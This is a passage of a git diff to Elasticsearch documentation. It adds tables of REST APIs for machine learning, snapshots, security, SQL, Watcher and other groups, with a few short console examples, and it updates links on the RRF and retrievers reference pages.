| | [Open Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-open-job) | Opens an existing anomaly detection job. | | [Close anomaly detection jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-close-job) | Closes an anomaly detection job. | | [Flush Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-flush-job) | Forces any buffered data to be processed. | | [Forecast Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-forecast) | Generates forecasts for anomaly detection jobs. | | [Get Buckets](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-buckets) | Retrieves bucket results from a job. | | [Get Records](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-records) | Retrieves anomaly records for a job. | | [Get calendar configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendars) | Gets calendar configuration information. | | [Create a calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar) | Create a calendar. | | [Delete a calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar) | Delete a calendar. | | [Delete events from a calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar-event) | Delete events from a calendar. | | [Add anomaly detection job to calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar-job) | Add an anomaly detection job to a calendar. | | [Delete anomaly detection jobs from calendar](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-calendar-job) | Deletes anomaly detection jobs from a calendar. | | [Get datafeeds configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-datafeeds) | Get configuration information for a datafeed. | | [Create datafeed](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-datafeed) | Creates a datafeed. | | [Delete a datafeed](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-datafeed) | Deletes a datafeed. | | [Delete expired ML data](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-expired-data) | Delete all job results, model snapshots and forecast data that have exceeded their retention days period. | | [Get filters](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-filters) | Get a single filter or all filters. | | [Get anomaly detection job results for influencers](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-influencers) | Get anomaly detection job results for entities that contributed to or are to blame for anomalies. | | [Get anomaly detection job stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-job-stats) | Get anomaly detection job stats.
|
+| [Get anomaly detection jobs configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-jobs) | You can get information for multiple anomaly detection jobs in a single API request by using a group name, a comma-separated list of jobs, or a wildcard expression. |
+
+### [Machine learning data frame analytics](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml-data-frame)
+
+The machine learning data frame analytics APIs enable you to perform data frame analytics activities.
+
+| API | Description |
+| --- | ----------- |
+| [Create a data frame analytics job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-data-frame-analytics) | Creates a data frame analytics job. |
+| [Get data frame analytics job configuration info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-data-frame-analytics) | Retrieves configuration and results for analytics jobs. |
+| [Delete a data frame analytics job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-data-frame-analytics) | Deletes a data frame analytics job. |
+| [Start a data frame analytics job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-data-frame-analytics) | Starts a data frame analytics job. |
+| [Stop data frame analytics jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-data-frame-analytics) | Stops a running data frame analytics job. |
+
+### [Machine learning trained models](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml-trained-model)
+
+The machine learning trained models APIs enable you to perform model management operations.
+
+| API | Description |
+| --- | ----------- |
+| [Put Trained Model](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model) | Uploads a trained model for inference. |
+| [Get Trained Models](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models) | Retrieves configuration and stats for trained models. |
+| [Delete Trained Model](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-trained-model) | Deletes a trained model. |
+| [Start Deployment](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-trained-model-deployment) | Starts a trained model deployment. |
+| [Stop Deployment](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-trained-model-deployment) | Stops a trained model deployment. |
+| [Get Deployment Stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models-stats) | Retrieves stats for deployed models. |
+
+### [Migration](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-migration)
+
+The migration APIs power {{kib}}'s Upgrade Assistant feature.
+
+
+| API | Description |
+| --- | ----------- |
+| [Deprecation Info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-deprecations) | Retrieves deprecation warnings for cluster and indices. |
+| [Get Feature Upgrade Status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-get-feature-upgrade-status) | Checks upgrade status of system features. |
+| [Post Feature Upgrade](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-migration-post-feature-upgrade) | Upgrades internal system features after a version upgrade. |
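+
+For example, you can list the deprecated settings and features that must be addressed before upgrading (a minimal sketch; the response groups warnings by cluster, node, and index level):
+
+```console
+GET /_migration/deprecations
+```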
+
+### [Node lifecycle](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-shutdown)
+
+The node lifecycle APIs enable you to prepare nodes for temporary or permanent shutdown, monitor the shutdown status, and enable a previously shut-down node to resume normal operations.
+
+| API | Description |
+| --- | ----------- |
+| [Exclude nodes from voting](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions) | Excludes nodes from voting in master elections. |
+| [Clear voting config exclusions](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-delete-voting-config-exclusions) | Clears voting config exclusions. |
+
+### [Query rules](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-query_rules)
+
+Query rules enable you to configure per-query rules that are applied at query time to queries that match the specific rule. Query rules are organized into rulesets, collections of query rules that are matched against incoming queries. Query rules are applied using the rule query. If a query matches one or more rules in the ruleset, the query is re-written to apply the rules before searching. This allows pinning documents for only queries that match a specific term.
+
+| API | Description |
+| --- | ----------- |
+| [Create or update query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-ruleset-put-query-ruleset) | Creates or updates a query ruleset. |
+| [Get query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-ruleset-get-query-ruleset) | Retrieves one or more query rulesets. |
+| [Delete query ruleset](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-ruleset-delete-query-ruleset) | Deletes a query ruleset. |
+
+### [Rollup](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-rollup)
+
+The rollup APIs enable you to create, manage, and retrieve information about rollup jobs.
+
+| API | Description |
+| --- | ----------- |
+| [Create or update rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-put-job) | Creates or updates a rollup job for summarizing historical data. |
+| [Get rollup jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-jobs) | Retrieves configuration for one or more rollup jobs. |
+| [Delete rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-delete-job) | Deletes a rollup job. |
+| [Start rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-start-job) | Starts a rollup job. |
+| [Stop rollup job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-stop-job) | Stops a running rollup job. |
+| [Get rollup capabilities](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-rollup-caps) | Returns the capabilities of rollup jobs. |
+| [Search rollup data](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-rollup-search) | Searches rolled-up data using a rollup index. |
+
+### [Script](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-script)
+
+Use the script support APIs to get a list of supported script contexts and languages. Use the stored script APIs to manage stored scripts and search templates. 
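+
+As a brief illustration, a stored script can be created once and then referenced by ID from searches and ingest pipelines (a minimal sketch; the `calculate-discount` ID and the `price` and `discount` names are hypothetical):
+
+```console
+PUT _scripts/calculate-discount
+{
+  "script": {
+    "lang": "painless",
+    "source": "doc['price'].value * params.discount"
+  }
+}
+```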
+
+
+| API | Description |
+| --- | ----------- |
+| [Add or update stored script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-put-script) | Adds or updates a stored script. |
+| [Get stored script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-get-script) | Retrieves a stored script. |
+| [Delete stored script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-delete-script) | Deletes a stored script. |
+| [Execute Painless script](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-script-painless-execute) | Executes a script using the Painless language. |
+| [Get script contexts](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-context) | Returns available script execution contexts. |
+| [Get script languages](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-script-languages) | Returns available scripting languages. |
+
+### [Search](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-search)
+
+The search APIs enable you to search and aggregate data stored in {{es}} indices and data streams.
+
+| API | Description |
+| --- | ----------- |
+| [Search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) | Executes a search query on one or more indices. |
+| [Multi search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-msearch) | Executes multiple search requests in a single API call. |
+| [Search template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-template) | Executes a search using a stored or inline template. |
+| [Render search template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-render-search-template) | Renders a search template with parameters. |
+| [Explain search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-explain) | Explains how a document scores against a query. |
+| [Validate query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-validate-query) | Validates a query without executing it. |
+| [Get field capabilities](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-field-caps) | Returns the capabilities of fields across indices. |
+| [Scroll search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-scroll) | Efficiently retrieves large numbers of results (pagination). |
+| [Clear scroll](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-clear-scroll) | Clears search contexts for scroll requests. |
+
+### [Search application](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-search_application)
+
+The search application APIs enable you to manage tasks and resources related to Search Applications.
+
+| API | Description |
+| --- | ----------- |
+| [Create or update search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put) | Creates or updates a search application. |
+| [Get search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get) | Retrieves a search application by name. |
+| [Delete search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete) | Deletes a search application. 
|
+| [Search search application](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-search) | Executes a search using a search application. |
+
+### [Searchable snapshots](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-searchable_snapshots)
+
+The searchable snapshots APIs enable you to perform searchable snapshot operations.
+
+| API | Description |
+| --- | ----------- |
+| [Mount searchable snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-mount) | Mounts a snapshot as a searchable index. |
+| [Clear searchable snapshot cache](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-clear-cache) | Clears the cache of searchable snapshots. |
+| [Get searchable snapshot stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-searchable-snapshots-stats) | Returns stats about searchable snapshots. |
+
+### [Security](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-security)
+
+The security APIs enable you to perform security activities, and add, update, retrieve, and remove application privileges, role mappings, and roles. You can also create and update API keys and create and invalidate bearer tokens.
+
+
+| API | Description |
+| --- | ----------- |
+| [Create or update user](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-user) | Creates or updates a user in the native realm. |
+| [Get user](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user) | Retrieves one or more users. |
+| [Delete user](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-user) | Deletes a user from the native realm. |
+| [Create or update role](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-role) | Creates or updates a role. |
+| [Get role](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-role) | Retrieves one or more roles. |
+| [Delete role](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-role) | Deletes a role. |
+| [Create API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-api-key) | Creates an API key for access without basic auth. |
+| [Invalidate API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-invalidate-api-key) | Invalidates one or more API keys. |
+| [Authenticate](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-authenticate) | Retrieves information about the authenticated user. |
+
+### [Snapshot and restore](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-snapshot)
+
+The snapshot and restore APIs enable you to set up snapshot repositories, manage snapshot backups, and restore snapshots to a running cluster.
+
+| API | Description |
+| --- | ----------- |
+| [Clean up snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-cleanup-repository) | Removes stale data from a repository. |
+| [Clone snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-clone) | Clones indices from a snapshot into a new snapshot. |
+| [Get snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get) | Retrieves information about snapshots. 
|
+| [Create snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create) | Creates a snapshot of one or more indices. |
+| [Delete snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete) | Deletes a snapshot from a repository. |
+| [Get snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-get-repository) | Retrieves information about snapshot repositories. |
+| [Create or update snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-create-repository) | Registers or updates a snapshot repository. |
+| [Delete snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-delete-repository) | Deletes a snapshot repository. |
+| [Restore snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-restore) | Restores a snapshot. |
+| [Analyze snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-analyze) | Analyzes a snapshot repository for correctness and performance. |
+| [Verify snapshot repository](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-repository-verify-integrity) | Verifies the integrity of the contents of a snapshot repository. |
+| [Get snapshot status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-snapshot-status) | Gets the status of a snapshot. |
+
+### [Snapshot lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-slm)
+
+The snapshot lifecycle management APIs enable you to set up policies to automatically take snapshots and control how long they are retained.
+
+| API | Description |
+| --- | ----------- |
+| [Get snapshot lifecycle policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-lifecycle) | Retrieves one or more snapshot lifecycle policies. |
+| [Create or update snapshot lifecycle policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-put-lifecycle) | Creates or updates a snapshot lifecycle policy. |
+| [Delete snapshot lifecycle policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-delete-lifecycle) | Deletes a snapshot lifecycle policy. |
+| [Execute snapshot lifecycle policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-lifecycle) | Triggers a snapshot lifecycle policy manually. |
+| [Execute snapshot retention](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-execute-retention) | Manually applies the retention policy to immediately remove snapshots that are expired according to the snapshot lifecycle policy retention rules. |
+| [Get snapshot lifecycle stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-stats) | Returns statistics about snapshot lifecycle executions. |
+| [Get snapshot lifecycle status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-get-status) | Returns the status of the snapshot lifecycle management feature. |
+| [Start snapshot lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-start) | Starts the snapshot lifecycle management feature. |
+| [Stop snapshot lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-slm-stop) | Stops the snapshot lifecycle management feature. |
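+
+For example, assuming a policy named `nightly-snapshots` already exists, you can run it immediately instead of waiting for its next scheduled execution (a minimal sketch):
+
+```console
+POST /_slm/policy/nightly-snapshots/_execute
+```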
+
+### [SQL](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-sql)
+
+The SQL APIs enable you to run SQL queries on Elasticsearch indices and data streams.
+
+| API | Description |
+| --- | ----------- |
+| [Clear SQL cursor](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-clear-cursor) | Clears the server-side cursor for an SQL search. |
+| [Delete async SQL search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-delete-async) | Deletes an async SQL search. |
+| [Get async SQL search results](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async) | Retrieves results of an async SQL query. |
+| [Get async SQL search status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-get-async-status) | Gets the current status of an async SQL search or a stored synchronous SQL search. |
+| [SQL query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-query) | Executes an SQL query. |
+| [Translate SQL](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-sql-translate) | Translates SQL into Elasticsearch DSL. |
+
+### [Synonyms](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-synonyms)
+
+The synonyms management APIs provide a convenient way to define and manage synonyms in an internal system index. Related synonyms can be grouped in a "synonyms set".
+
+| API | Description |
+| --- | ----------- |
+| [Get synonym set](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym) | Retrieves a synonym set by ID. |
+| [Create or update synonym set](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-put-synonym) | Creates or updates a synonym set. |
+| [Delete synonym set](https://www.elastic.co/docs/api/doc/elasticsearch/endpoint/synonyms.delete_synonym) | Deletes a synonym set. |
+| [Get synonym rule](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-synonyms-get-synonym-rule) | Retrieves a specific synonym rule from a synonym set. |
+| [Get synonym sets](https://www.elastic.co/docs/api/doc/elasticsearch/endpoint/synonyms.get_synonyms) | Lists all synonym sets. |
+
+### [Task management](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-tasks)
+
+The task management APIs enable you to retrieve information about tasks or cancel tasks running in a cluster.
+
+| API | Description |
+| --- | ----------- |
+| [Cancel a task](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-tasks-cancel) | Cancels a running task. |
+| [Get task information](https://www.elastic.co/docs/api/doc/elasticsearch/v9/operation/operation-tasks-get) | Retrieves information about a specific task. |
+| [Get all tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-tasks-list) | Retrieves information about running tasks. |
+
+### [Text structure](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-text_structure)
+
+The text structure APIs enable you to find the structure of a text field in an {{es}} index. 
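+
+For example, a minimal sketch that asks {{es}} to infer the structure of a few log lines (the messages shown are made up):
+
+```console
+POST _text_structure/find_message_structure
+{
+  "messages": [
+    "[2024-05-21T10:35:01] INFO starting service",
+    "[2024-05-21T10:35:02] WARN disk usage at 85%"
+  ]
+}
+```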
+
+| API | Description |
+| --- | ----------- |
+| [Find the structure of a text field](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-field-structure) | Analyzes a field in an index and returns its structure. |
+| [Find the structure of a text message](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-message-structure) | Analyzes a list of text messages and returns their structure. |
+| [Find the structure of a text file](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-find-structure) | Analyzes a text file and returns its structure. |
+| [Test a Grok pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-text-structure-test-grok-pattern) | Tests a Grok pattern against lines of text. |
+
+### [Transform](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-transform)
+
+The transform APIs enable you to create and manage transforms.
+
+| API | Description |
+| --- | ----------- |
+| [Get transforms](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform) | Retrieves configuration for one or more transforms. |
+| [Create a transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-put-transform) | Creates a transform. |
+| [Get transform stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-get-transform-stats) | Gets usage information for transforms. |
+| [Preview transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-preview-transform) | Previews the results of a transform. |
+| [Reset a transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-reset-transform) | Resets a transform. |
+| [Delete transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-delete-transform) | Deletes a transform. |
+| [Schedule a transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-schedule-now-transform) | Instantly runs a transform to process data, regardless of its configured schedule. |
+| [Start transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-start-transform) | Starts a transform. |
+| [Stop transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-stop-transform) | Stops a running transform. |
+| [Update transform](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-update-transform) | Updates certain properties of a transform. |
+| [Upgrade all transforms](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-transform-upgrade-transforms) | Upgrades all transforms to the latest configuration format. |
+
+### [Usage](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-xpack)
+
+The usage API provides usage information about the installed X-Pack features.
+
+| API | Description |
+| --- | ----------- |
+| [Get information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-xpack-info) | Gets information about build details, license status, and a list of features currently available under the installed license. |
+| [Get usage information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-xpack-usage) | Gets information about the features that are currently enabled and available under the current license. |
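+
+For example, to see which features are enabled and how they are being used (a minimal sketch):
+
+```console
+GET /_xpack/usage
+```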
+
+
+### [Watcher](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-watcher)
+
+You can use Watcher to watch for changes or anomalies in your data and perform the necessary actions in response.
+
+| API | Description |
+| --- | ----------- |
+| [Acknowledge a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-ack-watch) | Acknowledges a watch action. |
+| [Activate a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-activate-watch) | Activates a watch. |
+| [Deactivate a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-deactivate-watch) | Deactivates a watch. |
+| [Get a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-watch) | Retrieves a watch by ID. |
+| [Create or update a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-put-watch) | Creates or updates a watch. |
+| [Delete a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-delete-watch) | Deletes a watch. |
+| [Run a watch](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-execute-watch) | Executes a watch manually. |
+| [Get Watcher index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-get-settings) | Gets settings for the Watcher internal index. |
+| [Update Watcher index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-update-settings) | Updates settings for the Watcher internal index. |
+| [Query watches](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-query-watches) | Retrieves all registered watches in a paginated manner, optionally filtered by a query. |
+| [Start the watch service](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-start) | Starts the Watcher service. |
+| [Get Watcher statistics](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stats) | Returns statistics about the Watcher service. |
+| [Stop the watch service](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-watcher-stop) | Stops the Watcher service. |
diff --git a/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md b/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md
index dc7f02a119397..c640929584bb7 100644
--- a/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md
+++ b/docs/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md
@@ -34,7 +34,7 @@ For the most up-to-date API details, refer to [Search APIs](https://www.elastic.
 ::::
 
 
-You can use RRF as part of a [search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) to combine and rank documents using separate sets of top documents (result sets) from a combination of [child retrievers](/reference/elasticsearch/rest-apis/retrievers.md) using an [RRF retriever](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever). A minimum of **two** child retrievers is required for ranking.
+You can use RRF as part of a [search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) to combine and rank documents using separate sets of top documents (result sets) from a combination of [child retrievers](/reference/elasticsearch/rest-apis/retrievers.md) using an [RRF retriever](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md). 
A minimum of **two** child retrievers is required for ranking. An RRF retriever is an optional object defined as part of a search request’s [retriever parameter](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#request-body-retriever). The RRF retriever object contains the following parameters: @@ -758,7 +758,7 @@ Highlighting on vector fields, using either the `knn` retriever or a `knn` query :::: -A more specific example of highlighting in RRF can also be found in the [retrievers examples](docs-content://solutions/search/retrievers-examples.md#retrievers-examples-highlighting-retriever-results) page. +A more specific example of highlighting in RRF can also be found in the [retrievers examples](retrievers/retrievers-examples.md#retrievers-examples-highlighting-retriever-results) page. ## Inner hits in RRF [_inner_hits_in_rrf] diff --git a/docs/reference/elasticsearch/rest-apis/retrievers.md b/docs/reference/elasticsearch/rest-apis/retrievers.md index cbcae05e42681..a076d34941c09 100644 --- a/docs/reference/elasticsearch/rest-apis/retrievers.md +++ b/docs/reference/elasticsearch/rest-apis/retrievers.md @@ -3,6 +3,7 @@ mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/retriever.html applies_to: stack: all + serverless: ga --- # Retrievers [retriever] @@ -10,992 +11,232 @@ applies_to: A retriever is a specification to describe top documents returned from a search. A retriever replaces other elements of the [search API](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search) that also return top documents such as [`query`](/reference/query-languages/querydsl.md) and [`knn`](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn). A retriever may have child retrievers where a retriever with two or more children is considered a compound retriever. This allows for complex behavior to be depicted in a tree-like structure, called the retriever tree, which clarifies the order of operations that occur during a search. ::::{tip} -Refer to [*Retrievers*](docs-content://solutions/search/retrievers-overview.md) for a high level overview of the retrievers abstraction. Refer to [Retrievers examples](docs-content://solutions/search/retrievers-examples.md) for additional examples. +Refer to [*Retrievers*](docs-content://solutions/search/retrievers-overview.md) for a high level overview of the retrievers abstraction. Refer to [Retrievers examples](retrievers/retrievers-examples.md) for additional examples. :::: - -::::{admonition} New API reference -For the most up-to-date API details, refer to [Search APIs](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-search). - -:::: - - The following retrievers are available: -`standard` -: A [retriever](#standard-retriever) that replaces the functionality of a traditional [query](/reference/query-languages/querydsl.md). - `knn` -: A [retriever](#knn-retriever) that replaces the functionality of a [knn search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn). +: The [knn](retrievers/knn-retriever.md) retriever replaces the functionality of a [knn search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search#search-api-knn). `linear` -: A [retriever](#linear-retriever) that linearly combines the scores of other retrievers for the top documents. +: The [linear](retrievers/linear-retriever.md) retriever linearly combines the scores of other retrievers for the top documents. 
+ +`pinned` {applies_to}`stack: GA 9.1` +: The [pinned](retrievers/pinned-retriever.md) retriever always places specified documents at the top of the results, with the remaining hits provided by a secondary retriever. `rescorer` -: A [retriever](#rescorer-retriever) that replaces the functionality of the [query rescorer](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore). +: The [rescorer](retrievers/rescorer-retriever.md) retriever replaces the functionality of the [query rescorer](/reference/elasticsearch/rest-apis/filter-search-results.md#rescore). `rrf` -: A [retriever](#rrf-retriever) that produces top documents from [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md). - -`text_similarity_reranker` -: A [retriever](#text-similarity-reranker-retriever) that enhances search results by re-ranking documents based on semantic similarity to a specified inference text, using a machine learning model. - -`pinned` {applies_to}`stack: GA 9.1` -: A [retriever](#pinned-retriever) that always places specified documents at the top of the results, with the remaining hits provided by a secondary retriever. +: The [rrf](retrievers/rrf-retriever.md) retriever produces top documents from [reciprocal rank fusion 